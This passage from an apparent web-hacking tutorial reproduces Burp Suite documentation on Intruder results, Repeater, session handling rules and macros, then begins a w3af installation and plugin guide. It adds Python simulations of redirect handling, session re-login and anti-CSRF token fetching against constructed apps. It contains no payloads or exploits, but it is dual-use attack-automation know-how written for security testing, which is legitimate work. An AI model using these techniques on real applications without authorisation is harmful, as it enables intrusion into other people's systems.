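    {"payload": "images", "status": 200, "body": "<html><title>Index of /images</title></html>", "time_ms": 31},
    {"payload": "foo",    "status": 404, "body": NOT_FOUND, "time_ms": 28},
    {"payload": "admin",  "status": 302, "body": "", "time_ms": 30},
    {"payload": "bar",    "status": 404, "body": NOT_FOUND, "time_ms": 29},
    {"payload": "baz",    "status": 404, "body": NOT_FOUND, "time_ms": 27},
]

# Constructed sample: a user-administration page for extract grep.
ADMIN_PAGE = ("<table><tr><td>Username:</td><td>bob</td></tr>"
              "<tr><td>Username:</td><td>alice</td></tr></table>")

if __name__ == "__main__":
    for row in analyse(SAMPLE_RESULTS, keywords=["Index of"]):
        print(row)
    print(extract_grep(ADMIN_PAGE, "<td>Username:</td><td>", "</td>"))
```

Taking the most common status and length as the baseline is the same judgement a tester makes by sorting the results view: the bulk of a content-discovery run is noise, and the rows worth opening are the few that differ from it. A per-request timing column would be added in the same way when the response time is the differentiator.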

You can annotate individual or multiple items, by adding comments and highlights:

You can highlight individual items using a drop-down menu on the left-most table column, and you can comment individual items in place by double-clicking and editing the table cell.

When you have annotated interesting requests, you can use column sorting and display filters to quickly find these items later.

If the attack was configured to store requests and/or responses, then you can use the preview pane to view these or double-click an individual result to display details of the request and response. This display provides detailed analysis and rendering of each HTTP message. The "previous" and "next" buttons can be used to cycle through the set of results. If the table in the results view has been sorted, then the results will be displayed in the sequence currently showing in that view. If the attack is configured to follow redirections, all intermediate responses and requests are also displayed, alongside the initial request and final response.

You can use the "action" button to send the request or response to other Burp Suite tools, such as Repeater. You can also right-click any item in the results table to show a context menu with various options. You can send the selected item to other tools, add multiple items to the Suite site map, annotate items with comments and highlights, or mark items to be re-requested. This option is useful if network errors or other problems have affected some of the results. If you have modified the base request template or other options during the attack, items to be re-requested will be rebuilt with the current configuration if possible. So, for example, if your application session has been terminated part way through an attack, you can modify the base request template with a new session token, and re-issue any failed requests so that they are executed within your new session.

At the top of the results table is a filter bar, which you can use to hide certain results, based on HTTP status code, search terms, and user-applied annotations. As well as filtering, you can also permanently delete items from the results, by selecting one or more items in the results table, and choosing "delete" from the context menu.

Results menus

The results view contains several menus with commands for controlling the attack, and saving the results, server responses and the attack itself. These are described below.

Attack menu

This contains commands to pause, resume, or repeat the attack.

Save menu

- attack - This is used to save a copy of the current attack, including results. The saved file can be loaded for further use from within the Burp Intruder control panel.
- results table - This is used to save the results table as a text file. Individual rows and columns can be selected, or the entire table can be saved. The field delimiter can also be configured. This function is useful for exporting the results into a spreadsheet for further analysis, or for saving a single column (such as data mined using the extract grep function) to be used as an input file for subsequent attacks or other tools.
- server responses - This is used to save the full responses received from the server to all requests. These can either be saved in individual files (sequentially numbered), or concatenated in sequence into a single file.
- attack configuration - This is used to save the configuration of the currently executing attack (not the results) enabling you to load that configuration into the main Intruder control panel to configure the same or a similar attack.

View menu

This contains commands to view or hide each of the available data columns in the results table (the columns available depend upon the configuration of the current attack).

Using Burp Repeater

Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

When you send a request to Repeater from another tool, that request gets its own tab. Each tab has its own request and response windows, and its own history. The top half of the panel allows you to configure the target host and port, and the details of your request. You can complete this information manually, however when you send a request from another Burp Suite tool the relevant details are all completed for you. When you have configured a request, click the "go" button to send it to the server. The response is displayed in the bottom half of the display. For both requests and responses, various views of the message are available:

- raw - This displays the message in plain text form. At the bottom of the text pane is a search and highlight function which can be used to quickly locate interesting strings within the message, such as error messages. An options pop-up on the left of the search bar lets you control case sensitivity, and whether to use simple text or regex search.
- params - For requests containing parameters (within the URL query string, the Cookie header, or the message body), this tab analyses the parameters into name/value pairs and allows these to be easily viewed and modified.
- headers - This shows the HTTP headers of the message as name/value pairs, and also displays any message body in raw form.
- hex - This allows direct editing of the raw binary data that make up the message. Certain types of traffic (e.g. browser requests with MIME-encoded parts) contain binary content that may be corrupted if modified in the text editor. To modify this type of message, the hex editor should be used.
- HTML / XML - For responses containing content in these formats, this provides a syntax-colourised view of the message body.
- render - For responses containing HTML or image content, this renders the content in visual form, as it would appear within your browser.
- AMF - For requests and responses in Action Message Format, this displays a tree view of the decoded message. If editable, you can double-click individual nodes in the tree to modify their values.
- viewstate - For requests containing an ASP.NET ViewState parameter, this deserialises the contents of the ViewState, enabling you to review the data contained for any sensitive items. It also indicates whether the ViewState MAC option is enabled (and therefore whether the ViewState can be modified).

Right-clicking on any request or response produces a context menu that can be used to perform various actions:

- send to - You can send any message, or a selected portion of the message, to other tools within Burp Suite, to perform further attacks or analysis.
- find references - [Pro version only] You can use this function to search all of Burp's tools for HTTP responses which link to the selected item.
- discover content - [Pro version only] You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.
- schedule task - [Pro version] You can use this function to create tasks which will run automatically at defined times and intervals.
- change request method - For requests, you can automatically switch the request method between GET and POST, with all relevant request parameters suitably relocated within the request. This option can be used to quickly test the application's tolerance of parameter location in potentially malicious requests (e.g. cross-site scripting).
- change body encoding - For requests, you can switch the encoding of any message body between application/x-www-form-urlencoded and multipart/form-data.
- copy URL - This function copies the full current URL to the clipboard.
- copy to file - This function allows you to select a file and copy the contents of the message to the file. This is handy for binary content, when copying via the clipboard may cause problems. Copying operates on the selected text or, if nothing is selected, the whole message.
- paste from file - This function allows you to select a file and paste the contents of the file into the message. This is handy for binary content, when pasting via the clipboard may cause problems. Pasting replaces the selected text or, if nothing is selected, inserts at the cursor position.
- save item - This function lets you specify a file to save the selected request and response in XML format, including all relevant metadata such as response length, HTTP status code and MIME type.
- convert selection - These functions enable you to perform quick encoding or decoding of the selected text in a variety of schemes.
- URL-encode as you type - If this option is turned on then characters like & and = will be automatically replaced with their URL-encoded equivalents as you type.

You can use the "<" and ">" buttons to browse back and forwards through the request history for the current tab, and modify and reissue any individual request, as necessary.

Options

The "repeater" menu controls aspects of Burp Repeater's behaviour.

You can create a new blank tab, delete an existing tab, or rename a tab's caption to help you keep track of your work.

If the "update Content-Length header" box is checked, then Burp Repeater will update the Content-Length header of each request (or add the header if necessary), with the correct value for the length of the HTTP body of that particular request. This feature is useful where the HTTP body has been manually modified, and so may have changed length. The HTTP specification, and most web servers, require the correct value for the length of the HTTP body to be specified using the Content-Length header. If the correct value is not specified, then the target server may return an error, may respond to an incomplete request, or may wait indefinitely for further data to be received in the request.

If the "unpack gzip / deflate" box is checked, then Burp Repeater will decompress gzip- and deflate-compressed content before displaying it.

The redirect settings control whether Burp Repeater will follow HTTP redirects (i.e. those with a 3xx status code and a Location header containing a new URL). The following options are available:

- Never - Repeater will not follow any redirects.
- On-site only - Repeater will only follow redirects to the same web "site", i.e. to URLs employing the same host, port and protocol as was used in the original request.
- In-scope only - Repeater will only follow to URLs that are within the Suite-wide target scope (defined in the "target" tab).
- Always - Repeater will follow redirects to any URL whatsoever. You should use this option with caution - occasionally, web applications relay your request parameters in redirections to third-party web sites, and by following redirects you may inadvertently attack an application that you do not intend to.

When Repeater receives a redirect that it is configured to follow, it will request the redirection URL (following up to 10 redirections if necessary, after which it stops so as to avoid infinite loops). The response from the redirection URL is then displayed in the response panel. The status message will indicate if a redirection was followed, and if so how many.

The option to follow redirects is often useful when an application returns a 3xx response to various kinds of input, with the more interesting features of the application's processing of your request being returned when the redirection target is requested. For example, when probing for common vulnerabilities, the application may frequently return a redirect to an error page - this page may contain useful information about the nature of the error which can be used to diagnose bugs like SQL injection.

If the "process cookies in redirects" option is selected, then any cookies set in the 3xx response will be resubmitted if a redirect to the same domain is followed.

Note that when Burp Repeater receives a redirection response which it is not configured to follow automatically, it will display a "follow redirect" button near to the top of the Repeater interface. This allows you to manually follow the redirect after viewing it. This feature is useful for walking through each request and response in a redirection sequence. New cookies will be processed in these manual redirects if this option has been set in the "process cookies" configuration described above.
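The redirect rules described for Intruder and again here for Repeater are the same decision procedure: resolve the Location header against the current URL, apply the never / on-site / in-scope / always policy, stop after ten hops, and optionally carry cookies set on the 3xx into the next request. The Python below is an added example of that procedure, not Burp's implementation. The `server` callable and the `fake_server` application it is exercised against are constructed stand-ins for the network, and "same domain" for cookie processing is taken to mean the same hostname.

```python
from urllib.parse import urljoin, urlsplit

MAX_REDIRECTS = 10   # both tools stop after ten hops, per the text above


def _site(url):
    """(scheme, host, port) with the default port filled in, so that
    https://h/ and https://h:443/ count as the same site."""
    p = urlsplit(url)
    port = p.port or {"http": 80, "https": 443}.get(p.scheme)
    return (p.scheme, (p.hostname or "").lower(), port)


def should_follow(policy, current_url, location, in_scope=lambda u: False):
    """Decide whether a 3xx Location may be followed under the given policy
    (never / on-site / in-scope / always).  Location may be relative, so it
    is resolved against the current URL first.  Returns (decision, target)."""
    target = urljoin(current_url, location)
    if policy == "never":
        return False, target
    if policy == "always":
        return True, target
    if policy == "on-site":
        return _site(current_url) == _site(target), target
    if policy == "in-scope":
        return bool(in_scope(target)), target
    raise ValueError("unknown policy: %s" % policy)


def follow_redirects(server, start_url, policy, process_cookies=False,
                     in_scope=lambda u: False):
    """Issue start_url and follow redirects according to policy.  server is a
    callable (url, cookies) -> (status, headers) standing in for the network.
    With process_cookies, a Set-Cookie on a 3xx is carried into the next
    request when the target is on the same host.  Returns
    (final status, URLs requested, redirects followed, cookies sent last)."""
    cookies, visited, followed = {}, [start_url], 0
    url = start_url
    status, headers = server(url, cookies)
    while 300 <= status < 400 and "Location" in headers and followed < MAX_REDIRECTS:
        ok, target = should_follow(policy, url, headers["Location"], in_scope)
        if not ok:
            break
        if process_cookies and "Set-Cookie" in headers and _site(url)[1] == _site(target)[1]:
            name, value = headers["Set-Cookie"].split(";", 1)[0].split("=", 1)
            cookies[name.strip()] = value.strip()
        url, followed = target, followed + 1
        visited.append(url)
        status, headers = server(url, cookies)
    return status, visited, followed, cookies


def fake_server(url, cookies):
    """Constructed application used only for this demonstration."""
    path = urlsplit(url).path
    if path == "/login":
        # Login result page needs the session issued by the 3xx response.
        return 302, {"Location": "/result", "Set-Cookie": "session=s1; Path=/"}
    if path == "/result":
        return (200, {}) if cookies.get("session") == "s1" else (401, {})
    if path == "/loop":
        return 302, {"Location": "/loop"}          # never terminates
    if path == "/out":
        # Relays the caller's URL to a third party, the case the text warns about.
        return 302, {"Location": "https://partner.example/?from=" + url}
    return 404, {}


if __name__ == "__main__":
    print(follow_redirects(fake_server, "https://app.example/login", "on-site", process_cookies=True))
    print(follow_redirects(fake_server, "https://app.example/loop", "always"))
    print(follow_redirects(fake_server, "https://app.example/out", "on-site"))
```

The /login case shows why "process cookies in redirects" exists: without it the redirect target is requested with no session and the result page answers 401, which would look like a failed login in a brute-force run even when the credentials were right. The /out case shows what "on-site" protects against: the relayed parameter would otherwise be sent to a host outside the test.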

The "action" sub-menu contains the same context-menu items as are available by right-clicking the request or response panels.

Session handling challenges

Some problems commonly encountered when performing any kind of fuzzing or scanning of web applications are:

- The application terminates the session being used for testing, either defensively or for other reasons, and the remainder of the testing exercise is ineffective.
- Some functions use changing tokens that must be supplied with each request (for example, to prevent request forgery attacks).
- Some functions require a series of other requests to be made before the request being tested, to get the application into a suitable state for it to accept the request being tested.

All of these problems can also arise when you are testing manually, and resolving them manually is often tedious, reducing your appetite for further testing.

Burp contains a range of features to help in all of these situations, letting you continue your manual and automated testing while Burp takes care of the problems for you in the background. All of the session-related configuration can be found in the "sessions" tab, within the main "options" tab.

Burp's cookie jar

Burp maintains a cookie jar which tracks the cookies being used in your various application sessions. The cookie jar is shared between all Burp's tools. Cookies set in responses are stored in the cookie jar, and can be automatically added to outgoing requests.

All of this is configurable so, for example, you can update the cookie jar for cookies received by the Proxy and Spider, and have Burp automatically add cookies to requests sent by the Scanner and Repeater. The cookie jar configuration is shown in the "sessions" tab within the main "options" tab. As shown, by default the cookie jar is updated based on traffic from the Proxy and Spider tools. You can view the contents of the cookie jar and edit cookies manually if you wish:

For all tools other than the Proxy, HTTP responses are examined to identify new cookies. In the case of the Proxy, incoming requests from the browser are also inspected. This is useful where an application has previously set a persistent cookie which is present in your browser, and which is required for proper handling of your session. Having Burp update its cookie jar based on requests through the Proxy means that all the necessary cookies will be added to the cookie jar even if the application does not update the value of this cookie during your current visit.

Burp's cookie jar honours the domain scope of cookies, in a way that mimics Internet Explorer's interpretation of cookie handling specifications. Path scope is not honoured.

Session handling rules

Burp lets you define a list of session handling rules, which give you very fine-grained control over how Burp deals with an application's session handling mechanism and related functionality. These rules are configured in the "sessions" tab within the main "options" tab.

Each rule comprises a scope (what the rule applies to) and actions (what the rule does). For every outgoing request that Burp makes, it determines which of the defined rules are in-scope for the request, and performs all of those rules' actions in order (unless a condition-checking action determines that no further actions should be applied to the request).

The scope for each rule can be defined based on any or all of the following features of the request being processed:

● The Burp tool that is making the request.
● The URL of the request.
● The names of parameters within the request.

Each rule can perform one or more actions. The following actions are implemented:

● Add cookies from the session handling cookie jar.
● Set a specific cookie or parameter value.
● Check whether the current session is valid, and perform sub-actions conditionally on the result.
● Prompt the user for in-browser session recovery.
● Run a macro.
● Run a post-request macro (this issues the current request, and then executes a further macro).

All of these actions are highly configurable, and can be combined in arbitrary ways to handle virtually any session handling mechanism. Being able to run arbitrary macros (defined request sequences), and update specified cookie and parameter values based on the result, allows you to automatically log back in to an application part way through an automated scan or Intruder attack. Being able to prompt for in-browser session recovery enables you to work with login mechanisms that involve keying a number from a physical token, or solving a CAPTCHA-style puzzle.

By creating multiple rules with different scopes and actions, you can define a hierarchy of behaviour that Burp will apply to different applications and functions. For example, on a particular test you could define the following rules:

● For all requests, add cookies from Burp's cookie jar.
● For requests to a specific domain, validate that the current session with that application is still active, and if not, run a macro to log back in to the application, and update the cookie jar with the resulting session token.
● For requests to a specific URL containing the __csrftoken parameter, first run a macro to obtain a valid __csrftoken value, and use this when making the request.

The details of how to configure Burp to achieve this are described in later sections.

Macros

A key part of Burp's session handling functionality is the ability to run macros, as defined in session handling rules. A macro is a predefined sequence of one or more requests. Typical use cases for macros include:

● Fetching a page of the application (such as the user's home page) to check that the current session is still valid.
● Performing a login to obtain a new valid session.
● Obtaining a token or nonce to use as a parameter in another request.
● When scanning or fuzzing a request in a multi-step process, performing the necessary preceding requests, to get the application into a state where the targeted request will be accepted.
● In a multi-step process, after the "attack" request, completing the remaining steps of the process, to confirm the action being performed, or obtain the result or error message from the conclusion of that process.

Macros are recorded using your browser. When defining a macro, Burp displays a view of the Proxy history, from which you can select the requests to be used for the macro. You can select from previously made requests, or record the macro afresh and select the new items from the history.

When you have recorded the macro, the macro editor shows the details of the items in the macro, which you can review and configure as required. As well as the basic sequence of requests, each macro includes some important configuration about how items in the sequence should be handled, and any interdependencies between items.

For each item in the macro, the following settings can be configured:

● Whether cookies from the session handling cookie jar should be added to the request.
● Whether cookies received in the response should be added to the session handling cookie jar.
● For each parameter in the request, whether it should use a preset value, or a value derived from a previous response in the macro.
● Whether key characters should be URL-encoded in updated parameter values.

The ability to derive a parameter's value from a previous response in the macro is particularly useful in some multi-stage processes, and in situations where applications make aggressive use of anti-CSRF tokens. When a new macro is defined, Burp tries to automatically find any relationships of this kind, by identifying parameters whose values can be determined from the preceding response (form field values, redirection targets, query strings in links, etc.). You can easily review and edit the default macro configuration applied by Burp before the macro is used. Further, the configured macro can be tested in isolation, and the full request/response sequence reviewed, to check that it is functioning in the way you require.

Worked example

Let's look at an application function which can only be accessed within an authenticated session, and employs a further token to defend against CSRF attacks. You want to test this function for various input-based vulnerabilities like XSS and SQL injection. Performing automated (and some manual) testing of this function faces two challenges: (a) ensuring that the session being used remains valid; and (b) obtaining a valid token to use in each request. Burp's session handling functionality can take care of both these challenges.

To do this, we're going to define some session handling rules. These rules will be applied to each request that is made to the function we are testing by the Intruder, Scanner and Repeater tools:

● Check whether the current session is valid, by requesting the user's landing page in the application, and inspecting the response to confirm that the user is still logged in.
● If the user is not logged in, log them back in to obtain a valid session.
● Request the page containing the form whose submission we are going to test. This form contains the anti-CSRF token that we need, within a hidden field.
● Update the request to the function we are testing with the value of the anti-CSRF token.

In most situations, we need to make use of Burp's own session handling cookie jar, so the first rule we define tells Burp to add cookies from the cookie jar to every request. This is, in fact, the default rule for the Scanner and Spider tools, so we'll just modify the default rule to apply to the Intruder and Repeater tools as well. This rule performs a single action (add cookies from the cookie jar), and its scope is defined to include the relevant tools and to apply to all URLs.

Next, we need to check that the user's current session on the target application is valid. Assuming we want to apply this rule to all requests within the target application, we can define it to be in-scope for the whole of the application's domain. We then add a suitable description and add an action of the type "check session is valid". This opens the editor for this type of action, which contains a lot of configuration options. The first set of options determines which request Burp uses to validate the current session. The options are:

● Issue the actual request that is currently being processed. This option is ideal if the application always responds to out-of-session requests with a common response signature, such as a redirection to the login.
● Run a macro, to make one or more other requests. This option is ideal if, to identify whether the session is valid, you need to request a standard item, such as the user's home page. It is also the best option if you need to apply further rules to modify the request currently being processed - for example (as in the present case) to update an anti-CSRF token in the request.

If the option to run a macro is selected, you have a further option whether to do this for every request, or only every N requests. If the application is aggressive in terminating sessions in response to unexpected input, it is recommended that you validate the session every time; otherwise, you can speed things up by only validating the session periodically.

For the current example, we are going to run a macro to fetch the user's landing page in the application, to check that their session is valid. To do this, we need to define our macro, by clicking on the "new" button in the action editor. This opens the macro recorder, enabling us to select the request(s) that we wish to include in the macro. In the present case, we only need to select the GET request for the user's landing page.

The second set of options in the "check session is valid" action controls how Burp inspects the (final) response from the macro to determine whether the session is valid. Various options are available; in the present case, Burp is configured to inspect the landing page response and confirm that the user is still logged in. The final set of options for this action determines how Burp will behave depending on whether the current session is valid:

● You can tell Burp not to perform any further actions for this request if the session is valid. Using this option lets you define subsequent, separate actions to recover a valid session. This option is mandatory if the request itself has already been issued in order to determine whether the session is valid.
● You can tell Burp to perform a sub-action if the session is invalid, and then continue to process subsequent actions. This is useful when you need to define subsequent actions in any case, following the session validity check, for example to run a macro to obtain a request token or modify the application's state.

In the present example, we need to use the second option. If the session is invalid, we will run a macro to log the user back in. We need to record a further macro, to perform the actual login, and tell Burp to run this macro and update the session handling cookie jar based on the results.

At this point, we have configured Burp to update requests with cookies from its cookie jar, and to log the user back in to the target application when their session is invalid. To complete the required configuration, we need to define a further rule to deal with the anti-CSRF token used in the function we want to test. The request we are testing looks like this:

POST /auth/4/NewUserStep2.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mdsec.net
Content-Length: 137
Cookie: SessionId=39DD9F0CB979BFB431005524A4010244

realname=testuser&username=testuser&userrole=user&password=letmein1&confirmpassword=letmein1&nonce=938549246127349541173

To ensure that our requests to this function are properly handled, we need to ensure that a valid nonce is supplied with each request. The value of this nonce is supplied by the application in a hidden field within the form that generates the above request. So our rule needs to run a macro to fetch the page containing the form, and update the current request with the value of the nonce parameter. We add a further rule with an action of the type "run macro" and configure it as follows:

In the above configuration, we have specified that Burp should run a new macro, which fetches the form containing the anti-CSRF token, and then obtain the nonce parameter from the (final) macro response, and update this in the request. Alternatively, we could select the "update all parameters" option, and Burp would automatically attempt to match parameters in the request with those specified in the macro response.

In terms of the scope for this rule, this obviously needs to be defined more narrowly than the whole application domain. For example, we could define the rule to apply only to the exact URL in the above request. This is the best option if the application only employs anti-CSRF tokens in a few locations. However, in some applications, tokens are used for a large number of functions, and a token obtained within one function can be submitted within a different function. In this situation, we could define a rule that applies to the whole domain, but only to requests containing a specified parameter name. In this way, any time a request is made to the application that contains an anti-CSRF token, the rule will execute and Burp will fetch a new valid token to use in the request.

The full configuration consists of three session handling rules and three macros, all of which are listed within the main Burp UI. You can test that the configuration is working by logging out of the application, sending the authenticated, token-protected request to Burp Repeater, and verifying that it performs the required action. The request will probably take longer to return than normal, because behind the scenes Burp is making several other requests, to validate your session, log in again if necessary, and obtain a token to use in the request.

If you find your rules are not working in the way you intended, you can use the session handling tracer to troubleshoot the problem. Once you are happy that your session handling rules are working correctly, you can send the request to Burp Intruder or Scanner, to perform your automated testing in the normal way.
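To make the worked example concrete, here is a small Python simulation of the three rules (cookie jar, session check with a login macro, token-fetch macro that derives the nonce from a hidden field). This is an added example written for this guide, not Burp Suite's or PortSwigger's code; the target application is a constructed in-memory stand-in, and its paths, credentials and the "Welcome" logged-in marker are assumptions for the demo.

```python
"""Simulation of the three session handling rules from the worked example.
Added example (not Burp Suite code). The target application is a constructed
in-memory stand-in: it issues a SessionId cookie at login, sends a fresh nonce
in a hidden form field, and rejects form submissions carrying a stale nonce."""
import re
import secrets


class FakeApp:
    """Constructed target: paths and behaviours are assumptions for this demo."""

    def __init__(self):
        self.sessions = {}   # SessionId -> {"nonce": current valid token or None}
        self.accepted = []   # successfully submitted forms

    def handle(self, method, path, cookies, params):
        """Return (status, headers, body) for one request."""
        if method == "POST" and path == "/login":
            if params.get("username") == "tester" and params.get("password") == "letmein":
                sid = secrets.token_hex(16)
                self.sessions[sid] = {"nonce": None}
                return 302, {"Set-Cookie": f"SessionId={sid}", "Location": "/home"}, ""
            return 200, {}, "Login failed"
        sess = self.sessions.get(cookies.get("SessionId"))
        if sess is None:                       # out-of-session: redirect to login
            return 302, {"Location": "/login"}, ""
        if path == "/home":
            return 200, {}, "<h1>Welcome tester</h1><a href='/logout'>Logout</a>"
        if path == "/form":                    # page that carries the anti-CSRF token
            sess["nonce"] = secrets.token_hex(8)
            return 200, {}, f'<form><input type="hidden" name="nonce" value="{sess["nonce"]}"></form>'
        if method == "POST" and path == "/submit":
            if sess["nonce"] is None or params.get("nonce") != sess["nonce"]:
                return 403, {}, "invalid token"
            sess["nonce"] = None               # tokens are single-use
            self.accepted.append(params)
            return 200, {}, "OK"
        return 404, {}, ""


class SessionHandler:
    """Applies the rules in order: add cookies from the jar, check the session
    (login macro on failure), run the token macro and update the nonce parameter."""

    def __init__(self, app):
        self.app = app
        self.cookie_jar = {}   # shared jar; like Burp's it ignores cookie path scope
        self.trace = []        # plays the role of the session handling tracer

    def issue(self, method, path, params=None):
        status, headers, body = self.app.handle(method, path, self.cookie_jar, params or {})
        if "Set-Cookie" in headers:            # update the jar from the response
            name, value = headers["Set-Cookie"].split("=", 1)
            self.cookie_jar[name] = value
        self.trace.append(f"{method} {path} -> {status}")
        return status, headers, body

    def session_is_valid(self):
        """Rule 2, check action: fetch the landing page and look for the logged-in marker."""
        status, _, body = self.issue("GET", "/home")
        return status == 200 and "Welcome" in body

    def login_macro(self):
        """Rule 2, sub-action on an invalid session: the recorded login request."""
        self.issue("POST", "/login", {"username": "tester", "password": "letmein"})

    def fetch_nonce_macro(self):
        """Rule 3: fetch the form and derive the nonce from its hidden field."""
        _, _, body = self.issue("GET", "/form")
        match = re.search(r'name="nonce" value="([^"]+)"', body)
        return match.group(1) if match else None

    def send(self, params):
        """Issue the request under test with all rules applied; returns the status code."""
        if not self.session_is_valid():
            self.login_macro()
        params = dict(params, nonce=self.fetch_nonce_macro())
        return self.issue("POST", "/submit", params)[0]


if __name__ == "__main__":
    app = FakeApp()
    handler = SessionHandler(app)
    print(handler.send({"comment": "first"}))    # fresh start: login + token fetch
    app.sessions.clear()                           # server-side session expiry
    print(handler.send({"comment": "second"}))   # re-login happens automatically
    print("\n".join(handler.trace))
```

The `trace` list is the equivalent of the session handling tracer: after a session expiry it shows the extra GET, POST /login and GET /form requests that Burp would issue behind the scenes before the request under test goes out, which is why such requests take longer to return.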

Session handling tracer

The configuration needed to apply Burp's session handling functionality to the features of real-world applications is often complex, and mistakes are easily made. Burp provides a tracer function for troubleshooting the session handling configuration. This shows you all of the steps performed when Burp applies session handling rules to a request, allowing you to see exactly how requests are being updated and issued. You can access the session handling tracer via options / sessions / view sessions tracer.

Integration with Burp tools

It is worth noting a few points about how the session handling features affect some of Burp's other functionality:

● There is a default session handling rule which updates all requests made by the Scanner and Spider with cookies from Burp's cookie jar. This ensures that all spidering and scanning requests are made in-session, provided you maintain a valid session using your browser. It also means that items in the active scan queue that are loaded from a state file will be scanned within your current session, not the session that was active when the state file was saved. If this is not the behaviour you require, you should disable the default session handling rule before performing any scanning.
● In cases where session handling rules modify a request before it is made (for example, to update a cookie or other parameter), some of Burp's tools will show the final, updated request, for purposes of clarity. This applies to the Intruder, Repeater and Spider tools. Requests that are shown within reported Scanner issues continue to show the original request, to facilitate clear comparison with the base request, where necessary. To observe the final request for a scan issue, as modified by the session handler, you can send the request to Burp Repeater and issue it there.
● When the Scanner or Intruder makes a request that manipulates a cookie or parameter that is affected by a session handling action, the action is not applied to that request, to avoid interfering with the test that is being performed. For example, if you are using Intruder to fuzz all the parameters in a request, and you have configured a session handling rule to update the "sessid" cookie in that request, then the "sessid" cookie will be updated when Intruder is fuzzing other parameters. When Intruder is fuzzing the "sessid" cookie itself, Burp will send the Intruder payload string as the "sessid" value, and will not update it as is done normally.

This means you have gone through all the modules in Burp Suite. So you have got an idea of how to hack a web application using Burp Suite, but wait: you forgot that W3AF was in store.

All the Burp Data has been flicked from a place which had the following message:

Copyright © 2010 PortSwigger Ltd. All rights reserved

So thanks to PortSwigger for the interesting help manual for the hackers.

The W3AF Framework:

This part is a guide for the Web Application Attack and Audit Framework ( w3af ), its goal is to provide a basic overview of what the framework is, how it works and what you can do with it. w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for auditing and penetration-testing.

I will try to make it precise, because it will be a great pain to copy-paste the materials and put them in a formatted manner.

But I will give what it takes for you to learn the framework. Ok then, it's get set GO.

Download

The framework can be downloaded from the project main page: http://w3af.sf.net/#download There are two ways to install w3af: from a release package (w3af setup for Windows and tgz package for Unix based systems) or from SVN. First time users should use the latest package, while more advanced users should perform an SVN checkout to get the latest version of the framework.

Installation

The framework should work on all platforms supported by Python; in particular, w3af has been tested on Linux, Windows XP, Windows Vista and OpenBSD. This user guide will guide you through the installation on a Linux platform; installing w3af on a Windows box is straightforward if you use the available installer, which can be downloaded from the official w3af site.

Installation Requirements

The required packages to run w3af can be divided in two groups:

● Core requirements:
  – Python 2.5
  – fpconst-0.7.2
  – pygoogle
  – nltk
  – SOAPpy
  – pyPdf
  – Beautiful Soup
  – Python OpenSSL
  – json.py
  – scapy
● Graphical user interface requirements:
  – python sqlite3
  – graphviz
  – pygtk 2.0
  – gtk 2.12

As you may have guessed, the core requirements are needed to run w3af with any user interface (console or graphical), and the graphical user interface requirements are needed only if you plan to use the GTK+ user interface. Some of the requirements are bundled with the distribution file, in order to make the installation process easier for the novice user. The bundled requirements can be found inside the extlib directory. Most of the libraries can be run from that directory, but some others require an installation process. The installation steps for these libraries are (as root; note the "cd .." after each package, so that every setup.py is run from its own directory):

cd w3af
cd extlib
cd fpconst-0.7.2
python setup.py install
cd ..
cd pygoogle
python setup.py install
cd ..
cd nltk
python setup.py install
cd ..
cd SOAPpy
python setup.py install
cd ..
cd pyPdf
python setup.py install

w3af phases

Before even running w3af a user must know how the application is divided and how plugins are going to be executed. Basically, w3af has three types of plugins: discovery, audit and attack.

Discovery plugins have only one responsibility: finding new URLs, forms, and other "injection points". A classic example of a discovery plugin is a web spider. This plugin takes a URL as input and returns one or more injection points. When a user enables more than one plugin of this type, they work in a loop: if plugin A finds a new URL in the first run, the w3af core will send that URL to plugin B. If plugin B then finds a new URL, it will be sent to plugin A. This process will go on until all plugins are run and no more knowledge about the application can be found using the enabled discovery plugins.

Audit plugins take the injection points found by discovery plugins and send specially crafted data to all of them in order to find vulnerabilities. A classic example of an audit plugin is one that searches for SQL injection vulnerabilities.

Attack plugins' objective is to exploit vulnerabilities found by audit plugins. They usually return a shell on the remote server, or a dump of remote tables in the case of SQL injection exploits.
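To make the discovery loop concrete, here is a toy model in Python. It is an added example written for this guide, not w3af's own code: two constructed discovery plugins, a link/form spider and a robots.txt reader, are run over a small in-memory site until neither can add a new URL or injection point, and the result is summarised in the same "URLs and points of injection" form that w3af prints after its discovery phase. The site contents, the plugin names and the plain-regex HTML parsing are assumptions for the demo.

```python
"""Toy model of the w3af discovery phase. Added example written for this guide,
not w3af's own code: two constructed discovery plugins (a link/form spider and a
robots.txt reader) feed each other through a work queue until no plugin can add
a new URL or injection point. Site contents and plugin behaviour are assumptions."""
import re
from collections import deque
from urllib.parse import parse_qsl, urljoin, urlsplit

# Constructed in-memory site: URL (query string stripped) -> response body.
SITE = {
    "http://localhost/robots.txt": "User-agent: *\nDisallow: /w3af/hidden/\n",
    "http://localhost/w3af/": '<a href="/w3af/webSpider/2.html">2</a> <a href="sqli/form.html">form</a>',
    "http://localhost/w3af/webSpider/2.html": '<a href="/w3af/">home</a> <a href="11.html">11</a>',
    "http://localhost/w3af/webSpider/11.html": "<p>leaf page</p>",
    "http://localhost/w3af/sqli/form.html": (
        '<form method="POST" action="dataReceptor.php">'
        '<input name="user"><input name="firstname"></form>'
    ),
    "http://localhost/w3af/sqli/dataReceptor.php": "<p>thanks</p>",
    "http://localhost/w3af/hidden/": '<a href="admin.php?id=1">admin</a>',
    "http://localhost/w3af/hidden/admin.php": "<p>admin</p>",
}


def fetch(url):
    """Stand-in for an HTTP GET: the body, or None when the URL does not exist."""
    return SITE.get(url)


def strip_query(url):
    """URLs are keyed without their query string; the parameters become injection points."""
    return urlsplit(url)._replace(query="", fragment="").geturl()


def web_spider(url):
    """Discovery plugin A: follows links and forms. Returns (new URLs, fuzzable requests),
    where a fuzzable request is (url, method, parameter names)."""
    body = fetch(url)
    if body is None:
        return set(), set()
    urls, fuzzable = set(), set()
    for href in re.findall(r'href="([^"]+)"', body):
        target = urljoin(url, href)
        params = tuple(name for name, _ in parse_qsl(urlsplit(target).query))
        urls.add(strip_query(target))
        if params:
            fuzzable.add((strip_query(target), "GET", params))
    form_re = r'<form method="(\w+)" action="([^"]+)">(.*?)</form>'
    for method, action, inner in re.findall(form_re, body, re.S):
        target = urljoin(url, action)
        urls.add(target)
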